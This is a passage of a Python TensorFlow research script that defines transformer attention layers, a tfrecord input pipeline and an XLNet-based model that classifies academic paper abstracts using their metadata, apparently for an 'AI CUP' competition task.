(batch_size, seq_len, d_model)\n ]\n )\n\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, rate=0.1):\n super(MultiHeadAttention, self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n\n assert d_model % self.num_heads == 0\n\n self.depth = d_model // self.num_heads\n\n self.wq = tf.keras.layers.Dense(\n units=d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n self.wk = tf.keras.layers.Dense(\n units=d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n self.wv = tf.keras.layers.Dense(\n units=d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n\n self.dropout = tf.keras.layers.Dropout(rate)\n self.dense = tf.keras.layers.Dense(\n d_model,\n activation=None,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.02)\n )\n\n def split_heads(self, x, batch_size):\n \"\"\"Split the last dimension into (num_heads, depth).\n Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)\n \"\"\"\n x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))\n return tf.transpose(x, perm=[0, 2, 1, 3])\n\n def call(self, v, k, q, mask, training):\n batch_size = tf.shape(q)[0]\n\n v = self.wv(v) # (batch_size, seq_len, d_model)\n k = self.wk(k) # (batch_size, seq_len, d_model)\n q = self.wq(q) # (batch_size, seq_len, d_model)\n\n v = self.split_heads(\n v, batch_size\n ) # (batch_size, num_heads, seq_len_v, depth)\n k = self.split_heads(\n k, batch_size\n ) # (batch_size, num_heads, seq_len_k, depth)\n q = self.split_heads(\n q, batch_size\n ) # (batch_size, num_heads, seq_len_q, depth)\n\n # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)\n # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)\n matmul_qk = tf.matmul(\n q, k, transpose_b=True\n ) # (..., seq_len_q, seq_len_k)\n # scale matmul_qk\n dk = tf.cast(tf.shape(k)[-1], tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n # add the mask to the 
scaled tensor.\n if mask is not None:\n scaled_attention_logits += (mask * -10000.0)\n # softmax is normalized on the last axis (seq_len_k) so that the scores\n # add up to 1.\n attention_weights = tf.nn.softmax(\n scaled_attention_logits, axis=-1\n ) # (..., seq_len_q, seq_len_k)\n # seq_len_k == seq_len_v\n attention_weights = self.dropout(attention_weights, training=training)\n scaled_attention = tf.matmul(\n attention_weights, v\n ) # (..., seq_len_q, depth_v)\n\n scaled_attention = tf.transpose(\n scaled_attention, perm=[0, 2, 1, 3]\n ) # (batch_size, seq_len_q, num_heads, depth)\n\n concat_attention = tf.reshape(\n scaled_attention, (batch_size, -1, self.d_model)\n ) # (batch_size, seq_len_q, d_model)\n\n output = self.dense(\n concat_attention\n ) # (batch_size, seq_len_q, d_model)\n\n return output, attention_weights\n\n\nclass EncoderLayer(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(EncoderLayer, self).__init__()\n\n self.mha = MultiHeadAttention(d_model, num_heads, rate)\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, training, mask):\n\n attn_output, _ = self.mha(\n inputs, inputs, inputs, mask, training=training\n ) # (batch_size, input_seq_len, d_model)\n attn_output = self.dropout1(attn_output, training=training)\n out1 = self.layernorm1(\n inputs + attn_output\n ) # (batch_size, input_seq_len, d_model)\n\n ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)\n ffn_output = self.dropout2(ffn_output, training=training)\n out2 = self.layernorm2(\n out1 + ffn_output\n ) # (batch_size, input_seq_len, d_model)\n\n return out2\n\n\nclass DecoderLayer(tf.keras.layers.Layer):\n def __init__(self, d_model, num_heads, dff, rate=0.1):\n super(DecoderLayer, self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads, rate)\n self.mha2 = MultiHeadAttention(d_model, num_heads, rate)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, attend_to, training, inputs_mask, attend_to_mask):\n # enc_output.shape == (batch_size, input_seq_len, d_model)\n\n attn1, _ = self.mha1(\n inputs, k=inputs, q=inputs, mask=inputs_mask, training=training\n ) # (batch_size, target_seq_len, d_model)\n attn1 = self.dropout1(attn1, training=training)\n out1 = self.layernorm1(attn1 + inputs)\n\n attn2, _ = self.mha2(\n attend_to,\n k=attend_to,\n q=out1,\n mask=attend_to_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n attn2 = self.dropout2(attn2, training=training)\n out2 = self.layernorm2(\n attn2 + out1\n ) # (batch_size, target_seq_len, d_model)\n\n ffn_output = self.ffn(out2) # (batch_size, target_seq_len, d_model)\n ffn_output = self.dropout3(ffn_output, training=training)\n out3 = self.layernorm3(\n ffn_output + out2\n ) # (batch_size, target_seq_len, d_model)\n\n return out3\n\n\nclass DecoderLayer5(tf.keras.layers.Layer):\n def __init__(self, d_model, 
num_heads, dff, rate=0.1):\n super(DecoderLayer5, self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads, rate)\n self.title_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.authors_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.categories_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.fields_mha = MultiHeadAttention(d_model, num_heads, rate)\n self.year_mha = MultiHeadAttention(d_model, num_heads, rate)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-12)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.title_dropout = tf.keras.layers.Dropout(rate)\n self.authors_dropout = tf.keras.layers.Dropout(rate)\n self.categories_dropout = tf.keras.layers.Dropout(rate)\n self.fields_dropout = tf.keras.layers.Dropout(rate)\n self.year_dropout = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, training, inputs_mask, title, title_mask, authors, authors_mask, categories, categories_mask, fields, fields_mask, year, year_mask):\n # enc_output.shape == (batch_size, input_seq_len, d_model)\n\n attn1, _ = self.mha1(\n inputs, k=inputs, q=inputs, mask=inputs_mask, training=training\n ) # (batch_size, target_seq_len, d_model)\n attn1 = self.dropout1(attn1, training=training)\n out1 = self.layernorm1(attn1 + inputs)\n\n title_attn, _ = self.title_mha(\n title,\n k=title,\n q=out1,\n mask=title_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n title_attn = self.title_dropout(title_attn, training=training)\n authors_attn, _ = self.authors_mha(\n authors,\n k=authors,\n q=out1,\n mask=authors_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n authors_attn = self.authors_dropout(authors_attn, training=training)\n categories_attn, _ = self.categories_mha(\n categories,\n k=categories,\n q=out1,\n mask=categories_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n categories_attn = self.categories_dropout(categories_attn, training=training)\n fields_attn, _ = self.fields_mha(\n fields,\n k=fields,\n q=out1,\n mask=fields_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n fields_attn = self.fields_dropout(fields_attn, training=training)\n year_attn, _ = self.year_mha(\n year,\n k=year,\n q=out1,\n mask=year_mask,\n training=training\n ) # (batch_size, target_seq_len, d_model)\n year_attn = self.year_dropout(year_attn, training=training)\n out2 = self.layernorm2(\n out1 + title_attn + authors_attn + categories_attn + fields_attn + year_attn\n ) # (batch_size, target_seq_len, d_model)\n\n ffn_output = self.ffn(out2) # (batch_size, target_seq_len, d_model)\n ffn_output = self.dropout3(ffn_output, training=training)\n out3 = self.layernorm3(\n ffn_output + out2\n ) # (batch_size, target_seq_len, d_model)\n\n return out3\n\n\nclass TransformerEncoder(tf.keras.layers.Layer):\n def __init__(\n self,\n num_layers,\n d_model,\n num_heads,\n dff,\n input_vocab_size,\n maximum_position_encoding,\n rate=0.1\n ):\n super(TransformerEncoder, self).__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = tf.keras.layers.Embedding(input_vocab_size, d_model)\n self.pos_encoding = positional_encoding(\n maximum_position_encoding, self.d_model\n )\n\n self.enc_layers = [\n EncoderLayer(d_model, 
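# one independent EncoderLayer per depth; no weight sharing across layers\n            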
num_heads, dff, rate)\n for _ in range(num_layers)\n ]\n\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self, x, training, mask):\n\n seq_len = tf.shape(x)[1]\n\n # adding embedding and position encoding.\n x = self.embedding(x) # (batch_size, input_seq_len, d_model)\n x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n x += self.pos_encoding[:, :seq_len, :]\n\n x = self.dropout(x, training=training)\n\n for i in range(self.num_layers):\n x = self.enc_layers[i](x, training, mask)\n\n return x # (batch_size, input_seq_len, d_model)\n\n\nclass TransformerDecoder(tf.keras.layers.Layer):\n def __init__(\n self,\n num_layers,\n d_model,\n num_heads,\n dff,\n target_vocab_size,\n maximum_position_encoding,\n rate=0.1\n ):\n super(TransformerDecoder, self).__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = tf.keras.layers.Embedding(target_vocab_size, d_model)\n self.pos_encoding = positional_encoding(\n maximum_position_encoding, d_model\n )\n\n self.dec_layers = [\n DecoderLayer(d_model, num_heads, dff, rate)\n for _ in range(num_layers)\n ]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self, inputs, enc_output, training, look_ahead_mask, padding_mask):\n\n seq_len = tf.shape(inputs)[1]\n\n inputs = self.embedding(inputs) # (batch_size, target_seq_len, d_model)\n inputs *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))\n inputs += self.pos_encoding[:, :seq_len, :]\n inputs = self.dropout(inputs, training=training)\n\n for i in range(self.num_layers):\n inputs = self.dec_layers[i](\n inputs, enc_output, training, look_ahead_mask, padding_mask\n )\n\n # inputs.shape == (batch_size, target_seq_len, d_model)\n return inputs\n\n\ndef parse_aicup3_v16_tfrecords(serialized, mode, params):\n \"\"\"Parse a single aicup task1 v1 record which is expected to be a tensorflow.Example.\"\"\"\n features = {\n 'sentence_lengths': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'length': tf.FixedLenFeature(shape=(), dtype=tf.string),\n # 'embeddings': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'title_pooled': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'meta_pooled': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'segment_ids': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'authors': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'categories': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'fields': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'year': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'input_ids': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'title_length': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'title_input_ids': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'meta_length': tf.FixedLenFeature(shape=(), dtype=tf.string),\n 'meta_input_ids': tf.FixedLenFeature(shape=(), dtype=tf.string)\n }\n if mode != tf.estimator.ModeKeys.PREDICT:\n features['sentence_labels'] = tf.FixedLenFeature(\n shape=(), dtype=tf.string\n )\n features['labels'] = tf.FixedLenFeature(shape=(), dtype=tf.string)\n features['article_labels'] = tf.FixedLenFeature(\n shape=(), dtype=tf.string\n )\n parsed = tf.parse_single_example(\n serialized=serialized,\n # A scalar (0-D Tensor) of type string, a single binary\n # serialized `Example` proto.\n features=features,\n # A `dict` mapping feature keys to `FixedLenFeature` or\n # `VarLenFeature` values.\n example_names=None,\n # A scalar string Tensor, the associated name (optional).\n name=None\n # A name for this operation (optional).\n )\n features = {}\n 
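# Writer-side sketch (assumed, not shown in this file): each array is\n    # expected to have been serialized with ndarray.tobytes() into a bytes\n    # feature, e.g. with a hypothetical helper:\n    #   def _bytes_feature(arr):\n    #       return tf.train.Feature(bytes_list=tf.train.BytesList(value=[arr.tobytes()]))\n    #   tf.train.Example(features=tf.train.Features(feature={\n    #       'length': _bytes_feature(np.array([n], dtype=np.int32)),\n    #       'input_ids': _bytes_feature(np.array(ids, dtype=np.int32))}))\n    # which is why every field is recovered below with tf.decode_raw and an\n    # explicit out_type rather than a typed FixedLenFeature.\n    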
features['sentence_lengths'] = tf.decode_raw(\n parsed['sentence_lengths'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )\n features['sentence_sequence_length'] = tf.shape(\n input=features['sentence_lengths'], name=None, out_type=tf.int32\n )[0]\n features['length'] = tf.decode_raw(\n parsed['length'], out_type=tf.int32, little_endian=True, name=None\n )[0]\n # features['embeddings'] = tf.reshape(\n # tf.decode_raw(\n # parsed['embeddings'],\n # out_type=tf.float32,\n # little_endian=True,\n # name=None\n # ), [features['length'], -1]\n # )\n features['title_pooled'] = tf.decode_raw(\n parsed['title_pooled'],\n out_type=tf.float32,\n little_endian=True,\n name=None\n )\n features['meta_pooled'] = tf.decode_raw(\n parsed['meta_pooled'],\n out_type=tf.float32,\n little_endian=True,\n name=None\n )\n features['segment_ids'] = tf.cast(\n tf.decode_raw(\n parsed['segment_ids'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )\n features['authors'] = tf.decode_raw(\n parsed['authors'], out_type=tf.int32, little_endian=True, name=None\n )\n features['categories'] = tf.cast(\n tf.decode_raw(\n parsed['categories'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )\n features['fields'] = tf.cast(\n tf.decode_raw(\n parsed['fields'], out_type=tf.uint8, little_endian=True, name=None\n ), tf.int32\n )\n features['year'] = tf.cast(\n tf.decode_raw(\n parsed['year'], out_type=tf.uint8, little_endian=True, name=None\n ), tf.int32\n ) # 12\n features['input_ids'] = tf.decode_raw(\n parsed['input_ids'], out_type=tf.int32, little_endian=True, name=None\n )\n features['title_length'] = tf.decode_raw(\n parsed['title_length'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )[0]\n features['title_input_ids'] = tf.decode_raw(\n parsed['title_input_ids'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )\n features['meta_length'] = tf.decode_raw(\n parsed['meta_length'], out_type=tf.int32, little_endian=True, name=None\n )[0]\n features['meta_input_ids'] = tf.decode_raw(\n parsed['meta_input_ids'],\n out_type=tf.int32,\n little_endian=True,\n name=None\n )\n if mode != tf.estimator.ModeKeys.PREDICT:\n features['sentence_labels'] = tf.cast(\n tf.decode_raw(\n parsed['sentence_labels'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )\n labels = tf.cast(\n tf.decode_raw(parsed['labels'], out_type=tf.uint8), tf.int32\n )\n features['article_labels'] = tf.cast(\n tf.decode_raw(\n parsed['article_labels'],\n out_type=tf.uint8,\n little_endian=True,\n name=None\n ), tf.int32\n )[0]\n # sparse_softmax_cross_entropy_with_logits expects int32 or int64\n # tf.Tensor: shape=(sequence_length,), dtype=int32\n return features, labels\n else:\n return features\n\n\ndef input_fn(mode, params, config):\n \"\"\"Estimator `input_fn`.\n Args:\n mode: Specifies if training, evaluation or\n prediction. tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}\n params: model_params `dict` of hyperparameters. Will receive what\n is passed to Estimator in `params` parameter. This allows\n to configure Estimators from hyper parameter tuning.positional_encoding\n config: run_config configuration object. 
Will receive what is passed\n to Estimator in `config` parameter, or the default `config`.\n Allows updating things in your `model_fn` based on\n configuration such as `num_ps_replicas`, or `model_dir`.\n Returns:\n A 'tf.data.Dataset' object\n \"\"\"\n # the file names will be shuffled randomly during training\n dataset = tf.data.TFRecordDataset.list_files(\n file_pattern=params.tfrecord_pattern[mode],\n # A string or scalar string `tf.Tensor`, representing\n # the filename pattern that will be matched.\n shuffle=mode == tf.estimator.ModeKeys.TRAIN\n # If `True`, the file names will be shuffled randomly.\n # Defaults to `True`.\n )\n\n # Apply the interleave, prefetch, and shuffle first to reduce memory usage.\n\n # Preprocesses params.dataset_parallel_reads files concurrently and interleaves records from each file.\n def tfrecord_dataset(filename):\n return tf.data.TFRecordDataset(\n filenames=filename,\n # containing one or more filenames\n compression_type=None,\n # one of `\"\"` (no compression), `\"ZLIB\"`, or `\"GZIP\"`.\n buffer_size=params.dataset_buffer * 1024 * 1024\n # the number of bytes in the read buffer. 0 means no buffering.\n ) # 256 MB\n\n dataset = dataset.interleave(\n map_func=tfrecord_dataset,\n # A function mapping a nested structure of tensors to a Dataset\n cycle_length=params.dataset_parallel_reads,\n # The number of input Datasets to interleave from in parallel.\n block_length=1,\n # The number of consecutive elements to pull from an input\n # `Dataset` before advancing to the next input `Dataset`.\n num_parallel_calls=None\n )\n\n if mode == tf.estimator.ModeKeys.TRAIN:\n if tfversion[0] == 1 and tfversion[1] <= 13:\n dataset = dataset.apply(\n tf.contrib.data.shuffle_and_repeat(\n buffer_size=params.shuffle_buffer,\n # the maximum number elements that will be buffered when prefetching.\n count=params.repeat_count\n # the number of times the dataset should be repeated\n )\n )\n else:\n dataset = dataset.shuffle(buffer_size=params.shuffle_buffer)\n if params.repeat_count != 1:\n dataset = dataset.repeat(count=params.repeat_count)\n\n parse_fn = parse_aicup3_v16_tfrecords\n dataset = dataset.map(\n functools.partial(parse_fn, mode=mode, params=params),\n num_parallel_calls=int(params.num_cpu_threads / 2)\n )\n\n # Our inputs are variable length, so bucket, dynamic batch and pad them.\n # embed_dims = {\n # 'bert_uncased_L-12_H-768_A-12': 768,\n # 'bert_cased_L-12_H-768_A-12': 768,\n # 'bert_uncased_L-24_H-1024_A-16': 1024,\n # 'bert_cased_L-24_H-1024_A-16': 1024\n # }\n if mode != tf.estimator.ModeKeys.PREDICT:\n padded_shapes = (\n {\n # 'embeddings': [None, embed_dims[params.hub_model]],\n # 'title_embeddings': [768],\n 'title_pooled': [768],\n 'meta_pooled': [768],\n 'length': [],\n 'sentence_sequence_length': [],\n 'sentence_lengths': [None],\n 'sentence_labels': [None],\n 'article_labels': [],\n 'segment_ids': [None],\n 'authors': [None],\n 'categories': [None],\n 'fields': [None],\n 'year': [1],\n 'input_ids': [None],\n 'title_length': [],\n 'title_input_ids': [None],\n 'meta_length': [],\n 'meta_input_ids': [None]\n },\n [None]\n )\n dataset = dataset.apply(\n tf.data.experimental.bucket_by_sequence_length(\n element_length_func=lambda features, labels: features['length'],\n bucket_boundaries=[2**x for x in range(5, 13)],\n # [32, 64, 128, 256, 512, 1024, 2048, 4096, 8192, 16384]\n # [1024, 512, 256, 128, 64, 32, 16, 8, 4, 2, 1]\n bucket_batch_sizes=[\n min(params.batch_size * 2**x, params.max_batch_size)\n for x in range(8, -1, -1)\n ],\n 
padded_shapes=padded_shapes,\n padding_values=None, # Defaults to padding with 0.\n pad_to_bucket_boundary=False\n )\n )\n else:\n padded_shapes = {\n 'title_pooled': [768],\n 'meta_pooled': [768],\n 'length': [],\n 'sentence_sequence_length': [],\n 'sentence_lengths': [None],\n 'segment_ids': [None],\n 'authors': [None],\n 'categories': [None],\n 'fields': [None],\n 'year': [1],\n 'input_ids': [None],\n 'title_length': [],\n 'title_input_ids': [None],\n 'meta_length': [],\n 'meta_input_ids': [None]\n }\n dataset = dataset.padded_batch(\n params.predict_batch_size, padded_shapes=padded_shapes\n )\n\n dataset = dataset.prefetch(\n buffer_size=params.prefetch_buffer # 64 batches\n # A `tf.int64` scalar `tf.Tensor`, representing the\n # maximum number batches that will be buffered when prefetching.\n )\n return dataset\n\n\nclass RunConfig(object):\n \"\"\"RunConfig contains hyperparameters that could be different\n between pretraining and finetuning.\n These hyperparameters can also be changed from run to run.\n We store them separately from XLNetConfig for flexibility.\n \"\"\"\n def __init__(self, is_training, use_tpu, use_bfloat16, dropout, dropatt,\n init=\"normal\", init_range=0.1, init_std=0.02, mem_len=None,\n reuse_len=None, bi_data=False, clamp_len=-1, same_length=False):\n \"\"\"\n Args:\n is_training: bool, whether in training mode.\n use_tpu: bool, whether TPUs are used.\n use_bfloat16: bool, use bfloat16 instead of float32.\n dropout: float, dropout rate.\n dropatt: float, dropout rate on attention probabilities.\n init: str, the initialization scheme, either \"normal\" or \"uniform\".\n init_range: float, initialize the parameters with a uniform distribution\n in [-init_range, init_range]. Only effective when init=\"uniform\".\n init_std: float, initialize the parameters with a normal distribution\n with mean 0 and stddev init_std. 
Only effective when init=\"normal\".\n          mem_len: int, the number of tokens to cache.\n          reuse_len: int, the number of tokens in the current batch to be cached\n            and reused in the future.\n          bi_data: bool, whether to use bidirectional input pipeline.\n            Usually set to True during pretraining and False during finetuning.\n          clamp_len: int, clamp all relative distances larger than clamp_len.\n            -1 means no clamping.\n          same_length: bool, whether to use the same attention length for each token.\n        \"\"\"\n        self.init = init\n        self.init_range = init_range\n        self.init_std = init_std\n        self.is_training = is_training\n        self.dropout = dropout\n        self.dropatt = dropatt\n        self.use_tpu = use_tpu\n        self.use_bfloat16 = use_bfloat16\n        self.mem_len = mem_len\n        self.reuse_len = reuse_len\n        self.bi_data = bi_data\n        self.clamp_len = clamp_len\n        self.same_length = same_length\n\n\ndef model_fn(features, labels, mode, params, config):\n    # labels shape=(batch_size, sequence_length), dtype=int32\n    is_train = mode == tf.estimator.ModeKeys.TRAIN\n\n    # embeddings = features['embeddings']\n    # embeddings shape=(batch_size, sequence_length, 768), dtype=float32\n    # title_embeddings = features['title_embeddings']\n    title_pooled = features['title_pooled']\n    meta_pooled = features['meta_pooled']\n    # embeddings shape=(batch_size, 768), dtype=float32\n    lengths = features['length']\n    # lengths shape=(batch_size, ), dtype=int32\n    max_sentences = params.max_sentences\n    sentence_sequence_lengths = features['sentence_sequence_length']\n    # sentence_lengths = features['sentence_lengths']\n    segment_ids = features['segment_ids']\n    # segment_ids shape=(batch_size, sequence_length), dtype=int32\n    authors = features['authors']\n    categories = features['categories']\n    fields = features['fields']\n    year = features['year']\n    input_ids = features['input_ids']\n    title_lengths = features['title_length']\n    title_input_ids = features['title_input_ids']\n    meta_lengths = features['meta_length']\n    meta_input_ids = features['meta_input_ids']\n    global_step = tf.train.get_global_step()\n    # global_step is incremented (assign_add 1) in tf.train.Optimizer.apply_gradients\n    batch_size = tf.shape(lengths)[0]\n    # number of sequences per epoch\n    seq_total = batch_size\n    if mode == tf.estimator.ModeKeys.TRAIN:\n        seq_total = params.metadata['train']['articles']\n    else:\n        seq_total = params.metadata['test']['articles']\n\n    task1_embeddings = tf.constant(params.metadata['task1_embeddings'])\n    task2_embeddings = tf.constant(params.metadata['task2_embeddings'])\n    if mode != tf.estimator.ModeKeys.PREDICT:\n        sentence_labels = features['sentence_labels']\n        sentence_labels_flat = tf.RaggedTensor.from_tensor(\n            sentence_labels, padding=0\n        ).flat_values\n        sentence_classes = tf.nn.embedding_lookup(\n            task1_embeddings, sentence_labels_flat\n        )\n        article_labels = features['article_labels']\n        article_classes = tf.nn.embedding_lookup(\n            task2_embeddings, article_labels\n        )\n\n    if params.use_tensor_ops:\n        float_type = tf.float16\n    else:\n        float_type = tf.float32\n\n    with tf.name_scope(\"masking\"):\n        if mode != tf.estimator.ModeKeys.PREDICT:\n            word_maxlen = tf.shape(labels)[1]\n        else:\n            word_maxlen = tf.shape(input_ids)[1]\n        mask = tf.sequence_mask(\n            lengths=lengths, maxlen=word_maxlen, dtype=float_type\n        )  # 0 if padding\n        meta_maxlen = tf.shape(meta_input_ids)[1]\n        meta_mask = tf.sequence_mask(\n            lengths=meta_lengths, maxlen=meta_maxlen, dtype=tf.int32\n        )  # 0 if padding\n        title_maxlen = tf.shape(title_input_ids)[1]\n        title_mask = tf.sequence_mask(\n            lengths=title_lengths, maxlen=title_maxlen, 
dtype=tf.int32\n ) # 0 if padding\n sentence_maxlen = tf.reduce_max(sentence_sequence_lengths)\n sentence_mask = tf.sequence_mask(\n lengths=sentence_sequence_lengths, maxlen=sentence_maxlen, dtype=tf.float32\n )\n all_probs_mask = tf.expand_dims(sentence_mask, axis=2)\n word_padding_mask = tf.cast(tf.math.equal(mask, 0), tf.float32)[:, tf.newaxis, tf.newaxis, :]\n sent_padding_mask = tf.cast(\n tf.math.equal(sentence_mask, 0), tf.float32\n )[:, tf.newaxis, tf.newaxis, :]\n meta_padding_mask = tf.cast(tf.math.equal(meta_mask, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n title_padding_mask = tf.cast(tf.math.equal(title_mask, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n authors_padding_mask = tf.cast(tf.math.equal(authors, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n categories_padding_mask = tf.cast(tf.math.equal(categories, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n fields_padding_mask = tf.cast(tf.math.equal(fields, 0),\n tf.float32)[:, tf.newaxis, tf.newaxis, :]\n # mask shape=(batch_size, sequence_length), dtype=float32\n\n ## ckpt method\n init_checkpoint_root = Path(params.init_checkpoint_root)\n xlnet_config_file = str(init_checkpoint_root / 'xlnet_config.json')\n xlnet_config = xlnet.XLNetConfig(json_path=xlnet_config_file)\n\n with tf.variable_scope('abstract'):\n if params.use_xlnet_zero_seg_ids:\n seg_id = tf.zeros_like(tf.transpose(segment_ids, [1, 0]), dtype=tf.int32) # int32\n else:\n seg_id = tf.transpose(segment_ids, [1, 0]) # int32\n inp = tf.transpose(input_ids, [1, 0]) # int32\n inp_mask = tf.transpose(tf.cast(tf.math.equal(mask, 0), tf.float32), [1, 0]) # float32\n run_config = RunConfig(\n is_training=is_train,\n use_tpu=False,\n use_bfloat16=False,\n dropout=params.xlnet_dropout,\n dropatt=params.xlnet_dropout\n )\n abstract_model = xlnet.XLNetModel(\n xlnet_config=xlnet_config,\n run_config=run_config,\n input_ids=inp,\n seg_ids=seg_id,\n input_mask=inp_mask\n )\n abstract_features = tf.transpose(abstract_model.get_sequence_output(), [1, 0, 2])\n abstract_pooled = abstract_model.get_pooled_out('first', False)\n bert_hidden_size = abstract_features.shape[-1].value\n\n # init_from_checkpoint\n init_checkpoint = str(init_checkpoint_root / params.ckpt_name)\n tf.train.init_from_checkpoint(init_checkpoint, {'/': 'abstract/'})\n\n # with tf.variable_scope('title'):\n # title_inp = tf.transpose(title_input_ids, [1, 0]) # int32\n # title_inp_mask = tf.transpose(tf.cast(tf.math.equal(title_mask, 0), tf.float32), [1, 0]) # float32\n # run_config = RunConfig(\n # is_training=is_train,\n # use_tpu=False,\n # use_bfloat16=False,\n # dropout=params.xlnet_dropout,\n # dropatt=params.xlnet_dropout\n # )\n # title_model = xlnet.XLNetModel(\n # xlnet_config=xlnet_config,\n # run_config=run_config,\n # input_ids=title_inp,\n # seg_ids=tf.zeros_like(title_inp, tf.int32),\n # input_mask=title_inp_mask\n # )\n # title_features = tf.transpose(title_model.get_sequence_output(), [1, 0, 2])\n # # init_from_checkpoint\n # tf.train.init_from_checkpoint(init_checkpoint, {'/': 'title/'})\n\n if params.attend_to == 'authors':\n with tf.variable_scope('authors', values=[authors]):\n authors_vocab = len(params.metadata['authors_categories']) # 6216\n authors_features = tf.keras.layers.Embedding(\n input_dim=authors_vocab,\n output_dim=bert_hidden_size, # 64\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=authors)\n # 
authors_features: shape=(batch_size, authors_length, 768), dtype=float32\n attend_to = authors_features\n attend_to_mask = authors_padding_mask\n elif params.attend_to == 'categories':\n with tf.variable_scope('categories', values=[categories]):\n categories_vocab = len(params.metadata['cats_categories']) # 140\n categories_features = tf.keras.layers.Embedding(\n input_dim=categories_vocab,\n output_dim=bert_hidden_size, # 256\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=categories)\n # categories_features: shape=(batch_size, categories_length, 768), dtype=float32\n attend_to = categories_features\n attend_to_mask = categories_padding_mask\n elif params.attend_to == 'fields':\n with tf.variable_scope('fields', values=[fields]):\n fields_vocab = len(params.metadata['fields_categories']) # 22\n fields_features = tf.keras.layers.Embedding(\n input_dim=fields_vocab,\n output_dim=bert_hidden_size, # 16\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n embeddings_constraint=None,\n mask_zero=False,\n input_length=None\n )(inputs=fields)\n # fields_features: shape=(batch_size, fields_length, 768), dtype=float32\n attend_to = fields_features\n attend_to_mask = fields_padding_mask\n elif params.attend_to == 'year':\n with tf.variable_scope('year', values=[year]):\n year_vocab = len(params.metadata['year_categories']) # 6216\n year_features = tf.keras.layers.Embedding(\n input_dim=year_vocab,\n output_dim=bert_hidden_size, # 768\n embeddings_initializer=tf.truncated_normal_initializer(stddev=0.02),\n embeddings_regularizer=None,\n activity_regularizer=None,\n 